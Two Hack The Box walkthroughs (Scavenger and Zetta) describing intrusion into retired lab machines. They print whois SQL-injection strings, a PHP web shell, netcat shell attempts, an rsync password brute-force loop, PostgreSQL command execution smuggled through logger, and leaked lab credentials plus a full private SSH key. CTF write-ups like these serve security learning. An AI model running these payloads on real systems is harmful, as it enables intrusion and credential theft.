Hack The Box - Scavenger Writeup

System information

Initial scan

Nmap shows some services active and listening

Checking each daemon manually I can see that:

• FTP is  vsFTPd 3.0.3

• SMTP is ib01.supersechosting.htb ESMTP Exim 4.89

• HTTP is an Apache 2.4.25 on Debian. The standard page shows a vhost config error: 

• WHOIS is backed by a MariaDB database:

Opening the web page www.supersechosting.htb (one of the virtualhosts) I see this:

Nothing special on this page...

Initial foothold

As far as I know (maybe I'm dumb) there are no known vulnerabilities in the services, so my focus is on the whois with a MariaDB, which might be vulnerable to SQL injection.
After some tries, the first successful SQL command I can run is  a classic "UNION SELECT"

# whois  -h 10.10.10.155 "') UNION SELECT table_schema, table_name, 1 FROM information_schema.tables; "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37

% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

1222 (21000): The used SELECT statements have a different number of columns

The server basically replies that I can run SQL statement but the syntax is not OK (number of columns is not correct.

# whois  -h 10.10.10.155 "') UNION SELECT  table_name,1 FROM information_schema.tables  -- ' "

The reply is:

ALL_PLUGINSAPPLICABLE_ROLESCHARACTER_SETSCOLLATIONSCOLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENABLED_ROLESENGINESEVENTSFILESGLOBAL_STATUSGLOBAL_VARIABLESKEY_CACHESKEY_COLUMN_USAGEPARAMETERSPARTITIONSPLUGINSPROCESSLISTPROFILINGREFERENTIAL_CONSTRAINTSROUTINESSCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLESSTATISTICSSYSTEM_VARIABLESTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGESTRIGGERSUSER_PRIVILEGESVIEWSGEOMETRY_COLUMNSSPATIAL_REF_SYSCLIENT_STATISTICSINDEX_STATISTICSINNODB_SYS_DATAFILESTABLE_STATISTICSINNODB_SYS_TABLESTATSUSER_STATISTICSINNODB_SYS_INDEXESXTRADB_RSEGINNODB_CMP_PER_INDEXINNODB_TRXCHANGED_PAGE_BITMAPSINNODB_FT_BEING_DELETEDINNODB_LOCK_WAITSINNODB_LOCKSINNODB_TABLESPACES_ENCRYPTIONXTRADB_INTERNAL_HASH_TABLESINNODB_SYS_FIELDSINNODB_CMPMEM_RESETINNODB_CMPINNODB_FT_INDEX_TABLEINNODB_SYS_TABLESPACESINNODB_MUTEXESINNODB_BUFFER_PAGE_LRUINNODB_SYS_FOREIGN_COLSINNODB_CMP_RESETINNODB_BUFFER_POOL_STATSINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGNINNODB_METRICSINNODB_FT_DEFAULT_STOPWORDINNODB_CMPMEMINNODB_SYS_TABLESINNODB_SYS_COLUMNSINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB_CMP_PER_INDEX_RESETXTRADB_READ_VIEWINNODB_SYS_SEMAPHORE_WAITSINNODB_CHANGED_PAGESINNODB_FT_DELETEDINNODB_TABLESPACES_SCRUBBINGcustomers

This means that there is a table named customers s
Then the next is to find the name of the columns of the table:

# whois  -h 10.10.10.155 "') UNION SELECT  column_name,1 FROM information_schema.columns where table_name='customers' -- ' "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37

% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

% This query returned 3 object

Iddomaindata

This means that the columns are id, domain and data.

That reveals the following domains:

• Supersechosting.htb
• Justanotherblog.htb
• Pwnhats.htb
• Rentahacker.htb

After adding the domain mapping to my DNS I can open the websites in a web browser to find that:

• www. Supersechosting.htb looks like a plain html website

• www.justanotherblog.htb has only a “under construction” log

• www.Pwnhats.htb is an e-commerce site running PrestaShop on top of PHP, MySQL, PHPmyadmin

• www.rentahacker.htb is a blog on wordpress 5.0

I tried to find some vulnerability or CVE but with no luck.

I then tried to run dirbuster on them with no valuable results.

So I turned to DNS service to find additional information, performing a zone transfer (AXFR):

The website http://sec03.rentahacker.htb shows a page with an image and leet speech that the site was owned.

Running dirbuster I can find a login page of Mantis Bug tracker:

But it seems not valuable or usable to trigger. 

Dirbuster also shows other pages:

• wiki.php
• shell.php

The last one seems very very interesting and its output is blank: maybe it accepts some parameters, but which one?

Wfuzz can help to find them.

The syntax is wfuzz -w wordfile http://URL/FUZZ=sometext: wfuzz will substitute FUZZ with words form the wordfile.

IN this case: 

It picks words from the file common.txt file and gets URLs like this:

• http://sec03.rentahacker.htb/shell.php?admin=ls
• http://sec03.rentahacker.htb/shell.php?cmd=ls
• http://sec03.rentahacker.htb/shell.php?ftp=ls

The output is this one:

Where the 200 is the HTTP response code and the 0 in the columns means a reply with 0 lines, 0 word and 0 chars of output.

I let it run until I see a non zero output:

Corresponding to the parameter hidden

The next step is to use this parameter opening the URL http://sec03.rentahacker.htb/shell.php?hidden=ls 

Now I found a way to execute commands, it's time to try some commands.

First of all a ping back to my computer... and it works!

Next a reverse connection to my computer (telnet 10.10.16.65 6666), but it doesn't work.

Next a bind shell with nc -lvp 6666 -e /bin/sh but it's not working either.

User Escalation (more than one)

So I believe it's time to look into the filesystems. First look is in /home and there are some folders:

• ib01c01
• ib01c02
• ib01c03
• ib01ftp
• ib01wwwsupport

Looks like it will a long journey if I have to escalate more than one user...

The first look is in /home/ib01c03/www/ where I can find a wp-config.php but the output is not helpful

I can encode it with base64 and copy/paste the content to my machine and decode it

Looks like there is an account

• Username:   ib01c03
• Password:    Thi$sh1tIsN0tGut

Unfortunately it's not valid for SSH but it works with FTP

Connecting to it, I can look into his home, but no valuable content....

Tough there is something in /var/mail (which contains the user mail):

So now I  have an additional ftp account:

• User ib01ftp
• Pass: YghRt56_Ta

Connecting to FTP as user ib01ftp I can find two folders

In the first one there is a note.txt file, a pcap and a log file

The note.txt file gives an hint to look into the pcap file

OPening the pcap file with wireshark I can filter the HTTP streams and the 20th tcp stream 

So I believe we can find some juicy content in the pcap file

Looking into TCP streams I can find the  “tcp.stream eq 20” a POST to an admin dashboard with username and password

URL: http://www.pwnhats.htb/admin530o6uisg/

Username: pwnhats@pwnhats.htb

Password:    GetYouAH4t!

OPening it with web browser I can see that it is the admin dashboard of Prestashop E-commerce

In another tcp flow I see that there is a specific POST call that use a Proxy settings in the IMAP section that is prone to RCE. 

The part in the red circle can be decoded as a reverse shell netcat:

This is confirmed on the scavenger machine 

The next step is to use Burp to replicate this POST request to execute commands like a ping back to my computer:

I can try to execute commands like netcat but I think the connection are blocked, so I choose to upload a shell2.php file with a command like this one:

echo "<?php echo \"<pre>AAAA\"; \$cmd=(\$_REQUEST['cmd']); system(\$cmd);  ?>"  > shell2.php 

I encode it as base64 and put int BURP  and use it:

I'm able to execute commands as user ib01c01 (please ignore the "AAAA" strings I added during debugging.

Next I can execute ls in the home folder and show the user.txt file which contains the user flag

The file access.txt contains credentials for user ib01c01 valid for FTP but not for SSH:

Connecting to FTP I can see the content of the home:

But the .ssh folder is not writable, so no way to put a SSH public key to get shell access...

Also the other folder doesn't contain anything valuable.

Just for curiosity I can get to the startup iptables rules in /etc and see why the reverse shell is not working (basically only traffic on the ports of the listening services can flow in INPUT and OUTPUT:

Root Escalation

For this escalation I need to go back to the PCAP file.
Looking to TCP streams from the end of the file, I can see that there are some encrypted communication on port 4444 and 4445.
Just before this stream there is an HTTP (port 80) that can be filter with "tcp.stream eq 20". It downloads a file root.c:

Looking at it and searching the Internet, it seems that this is a rootkit for Linux.
Basically, it is a LKM that create a char device named /dev/ttyR0.
When a standard user send a special string to this device, its shell gets elevated privileges.

In the original code the magic string is g0tR0ot

So a command like 
echo "g0tR0ot" > /dev/ttyR0; id

will run id command as root

In the case of Scavenger I run the command lsmod

It seems that the machine has the LKM loaded.
But the command above is not elevating priveleges...

I believe that the LKM was compiled with a different magic string.
The compiled module (.ko file) can be found in “/home/ib01c01/…/” (note the space in front of the fiolder name) and can be downloaded with FTP.

With objdump tool I can disassmble and look into the code.
In a section of the code I can find the instructions that defines the magic value (the two movl below)

The magic word is defined by the hex string 67 33 74 50 72 31 76 which decoded to ASCII is g3tPr1v

So now using this string, I can execute id as root:

So it's only a matter of viewing the /root filder and discloses the content of some files

Credits.txt contains information on the LKM

root.txt contains the root flag

Hack The Box - Zetta Writeup

MACHINE DATA

• IP address: 10.10.10.156
• OS:             Linux
• Rating:         Hard
• Points:         40
• Phased out: Feb 21st 2020

Initial foothold and user 

Nmap reveals only the following services

1. SSH
2. FTP
3. HTTP

Looking into the main webpage we can find two hints.

• Any 32 char combination are valid user and password for ftp service: this doesn’t lead to an access to files or folders and it doesn’t seem to be vulnerable (PureFTPd)
• The webpage mentionsRFC 2428 which defines FXP extension for FTP protocol: maybe this FTP supports FXP extensions

The feature describe in the RFC 2428 is related to IPV6 that combined with FXP extension can lead to disclosure of IPv6 address of the Zetta server.
I can connect to port 21 with telnet and type in any 32 hex sequence as user and password

At the same time I can start a tcpdump session on my tun0 interface (the interface used by the VPN to hackthebox) which has an IPv6 address: dead:beef:4::100f


Now I can use the command EPRT (define in RFC 2428) to tell the FTP that my computer can be contacted on port 26000 for FXP extensions.
And then use a command STOR pass.txt to use this FXP extensions.

The file pass.txt is not needed: I only need Zetta  to contact my computer on port 26000 and on IPv6 protocol to find Zetta IPv6 address:

And looking at tcpdump output:

I can find the IPv6 address of Zetta is: dead:beef::250:56ff:febd:1dbe

And the next step is to scan Zetta on IPv6:

There is an additional port that can be interesting.
I can connect to it and find that it is a rsync server used for backup purposes.

So now I can try to get a copy of /etc/ folder from remote server to my local computer:

rsync -6  rsync://root@[dead:beef:0:0:250:56ff:febd:1dbe]:8730/etc/* rsync/

Unfortunately the /etc/ folder doesn't reveal any secrets (shadow file or other things), but there is the rsync configuration file that has an interesting section:

[home_roy]

        path = /home/roy

        read only = no

        # Authenticate user for security reasons.

        uid = roy

        gid = roy

        auth users = roy

        secrets file = /etc/rsyncd.secrets

        # Hide home module so that no one tries to access it.

        list = false

There is a misconfiguration because the folder is not in read only, so the user roy can use rsync to upload files

First step is to get a copy of the folder but I don't have the password of roy user so I have to bruteforce it with rockyou

for i in $(head -n 1000 rockyou.txt); do

     echo $i;

     echo $i| rsync -6 --password-file=- rsync://roy@[dead:beef:0:0:250:56ff:febd:871]:8730/home_roy/* roy ;

     if [ $? -eq 0 ];

     then

           echo password is $i

           exit 1

     fi

done

After a few minutes I got the password of roy, which is computer

Using rsync I can get a copy of roy home and I can find a .tudu.xml file in it which contains an obscure hint which will be useful later for root escalation:

I can leverage the write option to upload an authorized_keys file of my choice to use for SSH authentication:

root@NikITA:~/HTB/Zetta# rsync -6 -a authorized_keys   rsync://roy@[dead:beef::250:56ff:febd:871]:8730/home_roy/.ssh/

****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

You must have explicit, authorized permission to access this rsync

server. Unauthorized attempts and actions to access or use this

system may result in civil and/or criminal penalties.

All activities performed on this device are logged and monitored.

****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

@ZE::A staff

This rsync server is solely for access to the zetta master server.

The modules you see are either provided for "Backup access" or for

"Cloud sync".

Password:

root@NikITA:~/HTB/Zetta# ssh roy@10.10.10.156

Linux zetta 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

Last login: Sat Aug 31 15:43:18 2019 from 10.10.14.2

roy@zetta:~$ id

uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

roy@zetta:~$ cat user.txt

a575bdb345f2de0a3172c8282452be91

roy@zetta:~$ 

That concludes user escalation for Zetta

Root escalation

Looking around with roy user I found a git repo in /etc/rsyslog.d folder: this containes the config file of rsyslog that has a special config to store log messages in postgreSQL database.

Here is the config:

template(name="sql-syslog" type="list" option.sql="on") {

  constant(value="INSERT INTO systemevents (message, devicereportedtime) values ('")

  property(name="msg")

  constant(value="','")

  property(name="timereported" dateformat="pgsql" date.inUTC="on")

  constant(value="')")

}

# load module

module(load="ompgsql")

# Only forward local7.info for testing.

local7.info action(type="ompgsql" server="localhost" user="postgres" pass="*******" db="Syslog" template="sql-syslog")

I believe that there is a way to exploit this by triggering a specially crafted syslog message
The exploitation requires some effort to find the correct message so I decide to reproduce the config on my machine and try many combinations until I find a way to execute code.

The basic idea here is to use the logger command with the correct facility to send a message with the correct quote and escaping characters to execute SQL commands in PostgreSQL.
For example I was able to get the version of PostegreSQL with this command:

echo "',NULL); SELECT version();-- “ | logger -p local7.info

The version of the postgreSQL will be written in the table systemevents.
The reasons of reproducing the setup on my machine is that I can look at the PostgreSQL content, while i don't have any credetnails on Zetta for that.
Now that I can execute SQL commands I can leverage CVE-2019-9193 as stated on

PayloadsAllTheThings to execute Linux OS commands from inside PostgreSQL.

The original exploit is

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'id';

But I have to "encapsulate" it in the logger messages like this (please note the special escaping \$$ to get the apostrophe character to be correctly sent to PostgreSQL:

echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ id \$$;-- "  | logger -p local7.info

Once I'm able to execute commands, I can do anything, like listing content of folder, with some ls commands I can find that postgresql has a private ssh key, and I can copy it in tmp and make world readable with this commands:

echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ cp /var/lib/postgresql/.ssh/id_rsa /tmp/a \$$;-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ chmod 777 /tmp/a \$$;-- "  | logger -p local7.info

The content of the id-rsa key is:

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----

And I can use it to connect to zetta as postgres user:

Once inside as postgres user I can look at the history and I can find the command that originally created the postgres user as:

So the postgres user has a password: sup3rs3cur3p4ass@postgres

Remembering the hint in .tudu.xml file I can guess that the password of root user is sup3rs3cur3p4ass@root

And, yes it is: